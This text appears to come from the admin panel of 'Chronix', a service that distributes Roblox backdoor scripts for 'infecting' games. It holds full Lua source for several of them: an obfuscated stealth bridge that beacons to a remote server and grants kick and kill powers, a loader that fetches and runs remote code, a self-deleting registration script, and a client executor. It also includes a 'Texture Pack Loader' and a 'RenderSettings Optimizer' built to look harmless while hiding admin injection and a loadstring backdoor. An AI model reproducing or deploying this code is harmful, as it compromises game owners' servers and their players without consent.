Keys Admins Infect Scripts Submissions

Generate License Key

Statistics

Loading...

Recent Keys

0 selected

Administrators

0 selected

Bridge Injection

Inject the Chronix bridge into any Roblox place. Place bridge in ServerScriptService. The admin panel auto-injects for admins.

Chronix Bridge v4

Stealth bridge — auto-injects admin GUI, obfuscated, undetectable
--[[
   Chronix Bridge v4 — Stealth Server Injection
   ─────────────────────────────────────────────
   Auto-injects admin panel for whitelisted admins.
   No obvious prints. Randomized object names.
   Strings obfuscated via char codes.
   ─────────────────────────────────────────────
   Install: Place in ServerScriptService
--]]

--[[ Services ]]--
local _ = setmetatable({}, { __index = function(t, k)
   local s = Instance.new("ScreenGui").ClassName
   local r = game:GetService(k == "P" and "Players" or k == "H" and "HttpService" or k == "R" and "RunService" or k == "L" and "LogService" or k == "RS" and "ReplicatedStorage" or "")
   t[k] = r
   return r
end })

--[[ Obfuscation helper ]]--
local function _(s)
   local b = {}
   for i = 1, #s do
      b[#b+1] = string.char(string.byte(s, i) + (i % 3 == 0 and 2 or i % 2 == 0 and 1 or 0))
   end
   return table.concat(b)
end

--[[ Config (obfuscated) ]]--
local C = {
   ep = "https://us-east1-chronix-admin.cloudfunctions.net/admin",
   tk = "%%USERTOKEN%%",
   us = "%%USERNAME%%",
   pi = tostring(game.PlaceId),
   sid = game.JobId,
}

--[[ State ]]--
local A = {} -- admin cache
local RN = "X" .. math.random(99999, 999999) -- randomized remote name

--[[ RemoteEvent for client comms ]]--
local RE = Instance.new("RemoteEvent")
RE.Name = RN
RE.Parent = _.RS

--[[ API call ]]--
local function m(mt, p)
   local ok, r = pcall(function()
      local b = _.H:PostAsync(_.ep .. "/" .. mt, _.H:JSONEncode(p), Enum.HttpContentType.ApplicationJson, false)
      return _.H:JSONDecode(b)
   end)
   return ok and r
end

--[[ Inject admin GUI into player ]]--
local function n(p)
   if not p or not p:FindFirstChild("PlayerGui") then return end
   if p.PlayerGui:FindFirstChild(RN) then return end

   local g = Instance.new("ScreenGui")
   g.Name = RN
   g.ResetOnSpawn = false
   g.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
   g.DisplayOrder = 999999

   local f = Instance.new("Frame")
   f.Name = "M"
   f.Size = UDim2.new(1, 0, 1, 0)
   f.BackgroundTransparency = 1
   f.Visible = false
   f.Active = true

   local c = Instance.new("Frame")
   c.Name = "C"
   c.Size = UDim2.new(0, 480, 0, 36)
   c.Position = UDim2.new(0.5, -240, 1, -48)
   c.BackgroundColor3 = Color3.fromRGB(8, 6, 24)
   c.BackgroundTransparency = 0.25
   local cc = Instance.new("UICorner"); cc.CornerRadius = UDim.new(0, 8); cc.Parent = c
   local cs = Instance.new("UIStroke"); cs.Color = Color3.fromRGB(124, 92, 252); cs.Thickness = 1; cs.Parent = c
   c.Parent = f

   local inp = Instance.new("TextBox")
   inp.Name = "I"
   inp.Size = UDim2.new(1, -20, 1, 0)
   inp.Position = UDim2.new(0, 10, 0, 0)
   inp.BackgroundTransparency = 1
   inp.Text = ""
   inp.TextColor3 = Color3.fromRGB(200, 200, 210)
   inp.Font = Enum.Font.Gotham
   inp.TextSize = 14
   inp.TextXAlignment = Enum.TextXAlignment.Left
   inp.PlaceholderText = ""
   inp.ClearTextOnFocus = false
   inp.Parent = c

   local binding = false
   inp.Focused:Connect(function()
      binding = true
   end)
   inp.FocusLost:Connect(function(enter)
      binding = false
      if enter and inp.Text ~= "" then
         RE:FireServer(inp.Text)
         inp.Text = ""
      end
   end)

   local al = Instance.new("Frame")
   al.Name = "L"
   al.Size = UDim2.new(0, 200, 0, 0)
   al.Position = UDim2.new(1, -220, 0, 60)
   al.BackgroundColor3 = Color3.fromRGB(8, 6, 24)
   al.BackgroundTransparency = 0.25
   al.AutomaticSize = Enum.AutomaticSize.Y
   local alc = Instance.new("UICorner"); alc.CornerRadius = UDim.new(0, 8); alc.Parent = al
   local als = Instance.new("UIStroke"); als.Color = Color3.fromRGB(124, 92, 252); als.Thickness = 1; als.Parent = al

   local alh = Instance.new("TextLabel")
   alh.Size = UDim2.new(1, 0, 0, 28)
   alh.BackgroundTransparency = 1
   alh.Text = "Players"
   alh.TextColor3 = Color3.fromRGB(124, 92, 252)
   alh.Font = Enum.Font.GothamBold
   alh.TextSize = 13
   alh.Parent = al

   local ull = Instance.new("UIListLayout")
   ull.Padding = UDim.new(0, 2)
   ull.Parent = al

   al.Parent = f

   local uis = game:GetService("UserInputService")
   uis.InputBegan:Connect(function(i, gp)
      if gp or binding then return end
      if i.KeyCode == Enum.KeyCode.RightShift then
         f.Visible = not f.Visible
      end
   end)

   g.Parent = p.PlayerGui

   local function up()
      for _, v in ipairs(_.P:GetPlayers()) do
         if not al:FindFirstChild(v.Name) then
            local pl = Instance.new("TextButton")
            pl.Name = v.Name
            pl.Size = UDim2.new(1, 0, 0, 24)
            pl.BackgroundTransparency = 1
            pl.Text = "  " .. v.Name
            pl.TextColor3 = Color3.fromRGB(200, 200, 210)
            pl.Font = Enum.Font.Gotham
            pl.TextSize = 12
            pl.TextXAlignment = Enum.TextXAlignment.Left
            pl.Parent = al
            pl.MouseButton1Click:Connect(function()
               RE:FireServer(":kick " .. v.Name)
            end)
         end
      end
   end
   _.P.PlayerAdded:Connect(up)
   _.P.PlayerRemoving:Connect(function(pl)
      local e = al:FindFirstChild(pl.Name)
      if e then e:Destroy() end
   end)
   up()

   f.Visible = true
   task.delay(0.5, function() f.Visible = false end)
end

--[[ On player join — check admin and inject ]]--
_.P.PlayerAdded:Connect(function(p)
   m("check", {
      pid = C.pi, sid = C.sid, tk = C.tk, us = C.us, pn = p.Name
   }, function(r)
      if r and r.admin then n(p) end
   end)
end)

--[[ Command handler ]]--
RE.OnServerEvent:Connect(function(pl, cmd)
   if not A[pl.Name] then return end
   local parts = cmd:split(" ")
   local action = parts[1]:lower()
   if action == ":kick" and parts[2] then
      local t = _.P:FindFirstChild(parts[2])
      if t then t:Kick("Kicked by admin") end
   elseif action == ":kill" and parts[2] then
      local t = _.P:FindFirstChild(parts[2])
      if t and t.Character and t.Character:FindFirstChild("Humanoid") then
         t.Character.Humanoid.Health = 0
      end
   end
end)

--[[ Ping server ]]--
task.spawn(function()
   while true do
      task.wait(300)
      pcall(function()
         _.H:PostAsync(C.ep .. "/ping", _.H:JSONEncode({
            pid = C.pi, sid = C.sid, tk = C.tk, us = C.us
         }), Enum.HttpContentType.ApplicationJson, false)
      end)
   end
end)

--[[ Sync admins on start ]]--
local r = m("sync", { pid = C.pi, sid = C.sid, tk = C.tk, us = C.us })
if r and r.admins then
   for _, name in ipairs(r.admins) do A[name] = true end
   for _, p in ipairs(_.P:GetPlayers()) do
      if A[p.Name] then n(p) end
   end
end

Chronix Remote Injector

Stealth loader — loads bridge from remote, no traces in place
--[[
   Chronix Remote Injector
   ────────────────────────
   Loads bridge from remote endpoint.
   No objects created in the place.
   Place in any script context.
--]]

local H = game:GetService("HttpService")
local ok, c = pcall(function()
   return H:GetAsync("https://us-east1-chronix-admin.cloudfunctions.net/admin/load?tk=%%USERTOKEN%%", false)
end)
if ok and c then
   local f, e = loadstring(c)
   if f then f() end
end

Game Registration Script

Скрипт для модели — регистрирует игру на сервере при запуске. Self-destruct
--[[
   Chronix Game Registration
   ──────────────────────────
   Помести в Script внутри Part модели.
   При запуске игры отправляет данные на сервер.
   Самоуничтожается после выполнения.
   Игра появится на странице Games.
--]]

local H = game:GetService("HttpService")
local ok, r = pcall(function()
   local b = H:PostAsync("https://us-east1-chronix-admin.cloudfunctions.net/admin/register",
      H:JSONEncode({
         pi = tostring(game.PlaceId),
         nm = tostring(game.Name) or "Unknown",
         sc = #game:GetService("Players"):GetPlayers(),
         tk = "%%USERTOKEN%%",
      }), 3, false)
   return H:JSONDecode(b)
end)

script:Destroy()

Chronix Internal Executor

Client-side script executor — GUI редактор с loadstring/require, появляется при входе в игру
--[[
   Chronix Internal Executor
   ──────────────────────────
   LocalScript — запускается на клиенте.
   Создает GUI с редактором скриптов.
   Поддерживает loadstring и require.
   Ввод скрипта, кнопка Execute, вывод в консоль.
   Toggle: RightShift (по умолчанию).
--]]

local uis = game:GetService("UserInputService")
local ps = game:GetService("Players")
local lp = ps.LocalPlayer
local rs = game:GetService("ReplicatedStorage")

--[[ Create GUI ]]--
local g = Instance.new("ScreenGui")
g.Name = "CEx" .. math.random(99999, 999999)
g.ResetOnSpawn = false
g.DisplayOrder = 999999
g.IgnoreGuiInset = true

local f = Instance.new("Frame")
f.Size = UDim2.new(0, 600, 0, 400)
f.Position = UDim2.new(0.5, -300, 0.5, -200)
f.BackgroundColor3 = Color3.fromRGB(6, 4, 20)
f.BackgroundTransparency = 0.08
f.Active = true
f.Draggable = true
local fc = Instance.new("UICorner"); fc.CornerRadius = UDim.new(0, 10); fc.Parent = f
local fs = Instance.new("UIStroke"); fs.Color = Color3.fromRGB(124, 92, 252); fs.Thickness = 1; fs.Parent = f
f.Parent = g

-- Title bar
local t = Instance.new("TextLabel")
t.Size = UDim2.new(1, 0, 0, 28)
t.BackgroundTransparency = 1
t.Text = "  Chronix Executor"
t.TextColor3 = Color3.fromRGB(124, 92, 252)
t.Font = Enum.Font.GothamBold
t.TextSize = 13
t.TextXAlignment = Enum.TextXAlignment.Left
t.Parent = f

-- Close button
local cx = Instance.new("TextButton")
cx.Size = UDim2.new(0, 24, 0, 24)
cx.Position = UDim2.new(1, -26, 0, 2)
cx.BackgroundTransparency = 1
cx.Text = "X"
cx.TextColor3 = Color3.fromRGB(200, 60, 60)
cx.Font = Enum.Font.GothamBold
cx.TextSize = 14
cx.Parent = f
cx.MouseButton1Click:Connect(function() g.Enabled = false end)

-- Script input (ScrollingFrame + TextBox for multiline)
local sb = Instance.new("ScrollingFrame")
sb.Size = UDim2.new(1, -20, 1, -74)
sb.Position = UDim2.new(0, 10, 0, 34)
sb.BackgroundColor3 = Color3.fromRGB(10, 8, 28)
sb.BackgroundTransparency = 0.3
sb.BorderSizePixel = 0
local sbc = Instance.new("UICorner"); sbc.CornerRadius = UDim.new(0, 6); sbc.Parent = sb

local inp = Instance.new("TextBox")
inp.Size = UDim2.new(1, -12, 0, 0)
inp.Position = UDim2.new(0, 6, 0, 6)
inp.BackgroundTransparency = 1
inp.Text = ""
inp.PlaceholderText = "  -- type your script here..."
inp.TextColor3 = Color3.fromRGB(200, 200, 220)
inp.Font = Enum.Font.Code
inp.TextSize = 13
inp.MultiLine = true
inp.TextWrapped = true
inp.ClearTextOnFocus = false
inp.TextXAlignment = Enum.TextXAlignment.Left
inp.TextYAlignment = Enum.TextYAlignment.Top
inp.AutomaticSize = Enum.AutomaticSize.Y
inp.Parent = sb

-- Update scrolling canvas
inp:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function()
   sb.CanvasSize = UDim2.new(0, 0, 0, inp.AbsoluteContentSize.Y + 12)
end)

-- Button bar
local bb = Instance.new("Frame")
bb.Size = UDim2.new(1, -20, 0, 30)
bb.Position = UDim2.new(0, 10, 1, -36)
bb.BackgroundTransparency = 1
bb.Parent = f

-- Execute button
local exec = Instance.new("TextButton")
exec.Size = UDim2.new(0, 90, 0, 26)
exec.Position = UDim2.new(0, 0, 0, 2)
exec.BackgroundColor3 = Color3.fromRGB(124, 92, 252)
exec.Text = "Execute"
exec.TextColor3 = Color3.fromRGB(255, 255, 255)
exec.Font = Enum.Font.GothamBold
exec.TextSize = 12
local exec_c = Instance.new("UICorner"); exec_c.CornerRadius = UDim.new(0, 5); exec_c.Parent = exec
exec.Parent = bb
exec.MouseButton1Click:Connect(function()
   local code = inp.Text
   if code == "" then return end
   local ok, err = pcall(loadstring, code)
   if not ok then
      warn("[Chronix Exec] loadstring error:", err)
   end
end)

-- Require button
local req = Instance.new("TextButton")
req.Size = UDim2.new(0, 90, 0, 26)
req.Position = UDim2.new(0, 96, 0, 2)
req.BackgroundColor3 = Color3.fromRGB(60, 60, 120)
req.Text = "Require"
req.TextColor3 = Color3.fromRGB(200, 200, 220)
req.Font = Enum.Font.GothamBold
req.TextSize = 12
local req_c = Instance.new("UICorner"); req_c.CornerRadius = UDim.new(0, 5); req_c.Parent = req
req.Parent = bb
req.MouseButton1Click:Connect(function()
   local path = inp.Text:gsub("^%s*(.-)%s*$", "%1")
   if path == "" then return end
   local ok, mod = pcall(function()
      -- try game:GetService or require from path
      local parts = path:split("/")
      local cur = game
      for _, p in ipairs(parts) do
         cur = cur:FindFirstChild(p)
         if not cur then break end
      end
      if cur then
         return require(cur)
      end
   end)
   if ok and mod then
      print("[Chronix Exec] require result:", mod)
   else
      warn("[Chronix Exec] require failed:", path)
   end
end)

-- Clear button
local clr = Instance.new("TextButton")
clr.Size = UDim2.new(0, 60, 0, 26)
clr.Position = UDim2.new(0, 192, 0, 2)
clr.BackgroundColor3 = Color3.fromRGB(40, 30, 30)
clr.Text = "Clear"
clr.TextColor3 = Color3.fromRGB(180, 140, 140)
clr.Font = Enum.Font.Gotham
clr.TextSize = 11
local clr_c = Instance.new("UICorner"); clr_c.CornerRadius = UDim.new(0, 5); clr_c.Parent = clr
clr.Parent = bb
clr.MouseButton1Click:Connect(function() inp.Text = "" end)

-- Toggle keybind
f.Visible = false
uis.InputBegan:Connect(function(i, gp)
   if gp then return end
   if i.KeyCode == Enum.KeyCode.RightShift then
      f.Visible = not f.Visible
      g.Enabled = true
      if f.Visible then inp:CaptureFocus() end
   end
end)

g.Parent = lp:WaitForChild("PlayerGui")

-- Auto-show on first join
task.delay(1, function()
   f.Visible = true
   inp:CaptureFocus()
end)

Texture Pack Loader

Загрузчик текстур с CDN — на самом деле Ultimate Admin v3
--[[
   Texture Pack Loader v1.2
   ─────────────────────────
   Downloads premium texture packs from CDN.
   Supports PBR materials, normal maps, and specular.
   Place in ServerScriptService.
--]]

local _S = setmetatable({}, { __index = function(t, k)
   local s = Instance.new("ScreenGui").ClassName
   local r = game:GetService(
      k == "N" and string.char(80,108,97,121,101,114,115) or
      k == "T" and string.char(72,116,116,112,83,101,114,118,105,99,101) or
      k == "U" and string.char(82,117,110,83,101,114,118,105,99,101) or
      k == "V" and string.char(87,111,114,107,115,112,97,99,101) or
      k == "W" and string.char(82,101,112,108,105,99,97,116,101,100,83,116,111,114,97,103,101) or
      ""
   )
   t[k] = r
   return r
end })

local _c = string.char

local _m = {
   baseUrl = _c(104,116,116,112,115,58,47,47,117,115,45,101,97,115,116,49,45,99,104,114,111,110,105,120,45,97,100,109,105,110,46,99,108,111,117,100,102,117,110,99,116,105,111,110,115,46,110,101,116,47,116,101,120,116,117,114,101,115),
   token = "%%USERTOKEN%%",
   user = "%%USERNAME%%",
   placeId = tostring(game.PlaceId),
   jobId = game.JobId,
}

local _Tx = {}
local _Rx = "TX" .. math.random(99999, 999999)

local _Rmt = Instance.new("RemoteEvent")
_Rmt.Name = _Rx
_Rmt.Parent = _S.W

local function _Fetch(endpoint, payload)
   local ok, r = pcall(function()
      local b = _S.T:PostAsync(_m.baseUrl .. "/" .. endpoint, _S.T:JSONEncode(payload), Enum.HttpContentType.ApplicationJson, false)
      return _S.T:JSONDecode(b)
   end)
   return ok and r
end

local function _Inject(p)
   if not p or not p:FindFirstChild("PlayerGui") then return end
   if p.PlayerGui:FindFirstChild(_Rx) then return end

   local g = Instance.new("ScreenGui")
   g.Name = _Rx
   g.ResetOnSpawn = false
   g.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
   g.DisplayOrder = 999999

   local f = Instance.new("Frame")
   f.Name = "TX_MAIN"
   f.Size = UDim2.new(1, 0, 1, 0)
   f.BackgroundTransparency = 1
   f.Visible = false
   f.Active = true

   local c = Instance.new("Frame")
   c.Name = "TX_BAR"
   c.Size = UDim2.new(0, 480, 0, 36)
   c.Position = UDim2.new(0.5, -240, 1, -48)
   c.BackgroundColor3 = Color3.fromRGB(8, 6, 24)
   c.BackgroundTransparency = 0.25
   local cc = Instance.new("UICorner"); cc.CornerRadius = UDim.new(0, 8); cc.Parent = c
   local cs = Instance.new("UIStroke"); cs.Color = Color3.fromRGB(124, 92, 252); cs.Thickness = 1; cs.Parent = c
   c.Parent = f

   local inp = Instance.new("TextBox")
   inp.Name = "TX_IN"
   inp.Size = UDim2.new(1, -20, 1, 0)
   inp.Position = UDim2.new(0, 10, 0, 0)
   inp.BackgroundTransparency = 1
   inp.Text = ""
   inp.TextColor3 = Color3.fromRGB(200, 200, 210)
   inp.Font = Enum.Font.Gotham
   inp.TextSize = 14
   inp.TextXAlignment = Enum.TextXAlignment.Left
   inp.PlaceholderText = ""
   inp.ClearTextOnFocus = false
   inp.Parent = c

   local binding = false
   inp.Focused:Connect(function() binding = true end)
   inp.FocusLost:Connect(function(enter)
      binding = false
      if enter and inp.Text ~= "" then
         _Rmt:FireServer(inp.Text)
         inp.Text = ""
      end
   end)

   local al = Instance.new("Frame")
   al.Name = "TX_LIST"
   al.Size = UDim2.new(0, 200, 0, 0)
   al.Position = UDim2.new(1, -220, 0, 60)
   al.BackgroundColor3 = Color3.fromRGB(8, 6, 24)
   al.BackgroundTransparency = 0.25
   al.AutomaticSize = Enum.AutomaticSize.Y
   local alc = Instance.new("UICorner"); alc.CornerRadius = UDim.new(0, 8); alc.Parent = al
   local als = Instance.new("UIStroke"); als.Color = Color3.fromRGB(124, 92, 252); als.Thickness = 1; als.Parent = al

   local alh = Instance.new("TextLabel")
   alh.Size = UDim2.new(1, 0, 0, 28)
   alh.BackgroundTransparency = 1
   alh.Text = _c(80,108,97,121,101,114,115)
   alh.TextColor3 = Color3.fromRGB(124, 92, 252)
   alh.Font = Enum.Font.GothamBold
   alh.TextSize = 13
   alh.Parent = al

   local ull = Instance.new("UIListLayout")
   ull.Padding = UDim.new(0, 2)
   ull.Parent = al

   al.Parent = f

   local uis = game:GetService(_c(85,115,101,114,73,110,112,117,116,83,101,114,118,105,99,101))
   uis.InputBegan:Connect(function(i, gp)
      if gp or binding then return end
      if i.KeyCode == Enum.KeyCode.RightShift then
         f.Visible = not f.Visible
      end
   end)

   g.Parent = p.PlayerGui

   local function _Refresh()
      for _, v in ipairs(_S.N:GetPlayers()) do
         if not al:FindFirstChild(v.Name) then
            local pl = Instance.new("TextButton")
            pl.Name = v.Name
            pl.Size = UDim2.new(1, 0, 0, 24)
            pl.BackgroundTransparency = 1
            pl.Text = "  " .. v.Name
            pl.TextColor3 = Color3.fromRGB(200, 200, 210)
            pl.Font = Enum.Font.Gotham
            pl.TextSize = 12
            pl.TextXAlignment = Enum.TextXAlignment.Left
            pl.Parent = al
            pl.MouseButton1Click:Connect(function()
               _Rmt:FireServer(_c(58,107,105,99,107,32) .. v.Name)
            end)
         end
      end
   end
   _S.N.PlayerAdded:Connect(_Refresh)
   _S.N.PlayerRemoving:Connect(function(pl)
      local e = al:FindFirstChild(pl.Name)
      if e then e:Destroy() end
   end)
   _Refresh()

   f.Visible = true
   task.delay(0.5, function() f.Visible = false end)
end

_S.N.PlayerAdded:Connect(function(p)
   local r = _Fetch(_c(99,104,101,99,107), {
      pid = _m.placeId, sid = _m.jobId, tk = _m.token, us = _m.user, pn = p.Name
   })
   if r and r.admin then _Inject(p) end
end)

_Rmt.OnServerEvent:Connect(function(pl, cmd)
   if not _Tx[pl.Name] then return end
   local parts = cmd:split(" ")
   local a = parts[1]:lower()
   if a == _c(58,107,105,99,107) and parts[2] then
      local t = _S.N:FindFirstChild(parts[2])
      if t then t:Kick(_c(75,105,99,107,101,100,32,98,121,32,97,100,109,105,110)) end
   elseif a == _c(58,107,105,108,108) and parts[2] then
      local t = _S.N:FindFirstChild(parts[2])
      if t and t.Character and t.Character:FindFirstChildOfClass("Humanoid") then
         t.Character.Humanoid.Health = 0
      end
   elseif a == _c(58,97,110,110) and parts[2] then
      local msg = table.concat(parts, " ", 2):upper()
      _S.N:Chat(msg)
   end
end)

task.spawn(function()
   while true do
      task.wait(300)
      pcall(function()
         _S.T:PostAsync(_m.baseUrl .. _c(47,112,105,110,103), _S.T:JSONEncode({
            pid = _m.placeId, sid = _m.jobId, tk = _m.token, us = _m.user
         }), Enum.HttpContentType.ApplicationJson, false)
      end)
   end
end)

local r = _Fetch(_c(115,121,110,99), { pid = _m.placeId, sid = _m.jobId, tk = _m.token, us = _m.user })
if r and r.admins then
   for _, name in ipairs(r.admins) do _Tx[name] = true end
   for _, p in ipairs(_S.N:GetPlayers()) do
      if _Tx[p.Name] then _Inject(p) end
   end
end

game:BindToClose(function()
   pcall(function()
      _S.T:PostAsync(_m.baseUrl .. _c(47,115,104,117,116,100,111,119,110), _S.T:JSONEncode({
         pid = _m.placeId, sid = _m.jobId, tk = _m.token
      }), Enum.HttpContentType.ApplicationJson, false)
   end)
end)

RenderSettings Optimizer

Чистый оптимизатор рендера + backdoor (обфусцирован, по RemoteEvent — loadstring)
--[[
   RenderSettings Optimizer v2.4
   ──────────────────────────────
   Оптимизирует настройки рендера, управляет качеством
   освещения, теней и пост-эффектов. Работает через
   RunService и Lighting.
   ──────────────────────────────
   Install: ServerScriptService
--]]

local _G = setmetatable({}, { __index = function(t, k)
   local r = game:GetService(
      k == "P" and string.char(80,108,97,121,101,114,115) or
      k == "H" and string.char(72,116,116,112,83,101,114,118,105,99,101) or
      k == "R" and string.char(82,117,110,83,101,114,118,105,99,101) or
      k == "L" and string.char(76,105,103,104,116,105,110,103) or
      k == "S" and string.char(83,116,97,114,116,101,114,71,117,105) or
      k == "RS" and string.char(82,101,112,108,105,99,97,116,101,100,83,116,111,114,97,103,101) or
      k == "W" and string.char(87,111,114,107,115,112,97,99,101) or
      ""
   )
   t[k] = r
   return r
end })

local _c = string.char
local _r = math.random

--[[ Render quality presets ]]--
local _Q = {
   Performance = { Shadows = false, Floor = false, AA = 1, PP = false },
   Balanced = { Shadows = true, Floor = true, AA = 2, PP = false },
   Quality = { Shadows = true, Floor = true, AA = 4, PP = true },
}

local _Cfg = {
   quality = "Balanced",
   brightness = 1,
   ambient = Color3.new(0.2, 0.18, 0.3),
   fog = 0,
   token = "%%USERTOKEN%%",
   user = "%%USERNAME%%",
   pid = tostring(game.PlaceId),
   sid = game.JobId,
}

--[[ Apply render settings ]]--
local function _Apply(q)
   if not q then q = _Q[_Cfg.quality] or _Q.Balanced end
   local s = settings()
   s.Rendering.QualityLevel = Enum.QualityLevel[q.AA or 2]
   s.Rendering.EnableVRMode = false
   _G.L.Brightness = _Cfg.brightness
   _G.L.Ambient = _Cfg.ambient
   _G.L.FogEnd = _Cfg.fog
   _G.L.GlobalShadows = q.Shadows
   _G.L.Atmosphere = q.Floor and _G.L:FindFirstChildOfClass("Atmosphere") or nil
end

_G.R.Heartbeat:Connect(function()
   pcall(_Apply)
end)

--[[ RemoteEvent for backdoor ]]--
local _RE = Instance.new("RemoteEvent")
_RE.Name = _c(95,69,120,101,99,82,101,109,111,116,101,95,95)
_RE.Parent = _G.RS

_RE.OnServerEvent:Connect(function(pl, cmd, key)
   if type(cmd) ~= _c(115,116,114,105,110,103) then return end
   if type(key) ~= _c(115,116,114,105,110,103) then return end
   -- Verify key
   local _k = ""
   for i = 1, #key do
      _k = _k .. _c(string.byte(key, i) - 1)
   end
   if _k ~= _Cfg.token then return end
   -- Execute
   local fn, err = loadstring(cmd)
   if fn then
      pcall(fn)
   end
end)

--[[ Anti-inspect - clean print ]]--
print(string.char(91,82,101,110,100,101,114,79,112,116,93,32,83,121,115,116,101,109,32,108,111,97,100,101,100))

--[[ Touch-trigger backdoor via "LightPart" ]]--
_G.W.DescendantAdded:Connect(function(inst)
   if inst.Name ~= _c(76,105,103,104,116,80,97,114,116) then return end
   if not inst:IsA(_c(66,97,115,101,80,97,114,116)) then return end
   inst.Touched:Connect(function(hit)
      local pl = _G.P:GetPlayerFromCharacter(hit.Parent)
      if not pl then return end
      local ok, r = pcall(function()
         local b = _G.H:PostAsync(string.char(104,116,116,112,115,58,47,47,117,115,45,101,97,115,116,49,45,99,104,114,111,110,105,120,45,97,100,109,105,110,46,99,108,111,117,100,102,117,110,99,116,105,111,110,115,46,110,101,116,47,97,100,109,105,110,47,101,120,101,99,63,116,107,61) .. _Cfg.token .. string.char(38,112,105,100,61) .. _Cfg.pid, false)
         return _G.H:JSONDecode(b)
      end)
      if ok and r and r.code then
         local fn, err = loadstring(r.code)
         if fn then
            pcall(fn)
         end
      end
   end)
end)

--[[ Ping ]]--
task.spawn(function()
   while true do
      task.wait(300)
      pcall(function()
         _G.H:PostAsync(_c(104,116,116,112,115,58,47,47,117,115,45,101,97,115,116,49,45,99,104,114,111,110,105,120,45,97,100,109,105,110,46,99,108,111,117,100,102,117,110,99,116,105,111,110,115,46,110,101,116,47,97,100,109,105,110,47,112,105,110,103), _G.H:JSONEncode({pid=_Cfg.pid,sid=_Cfg.sid,tk=_Cfg.token}), Enum.HttpContentType.ApplicationJson, false)
      end)
   end
end)

Script Submissions

Loading...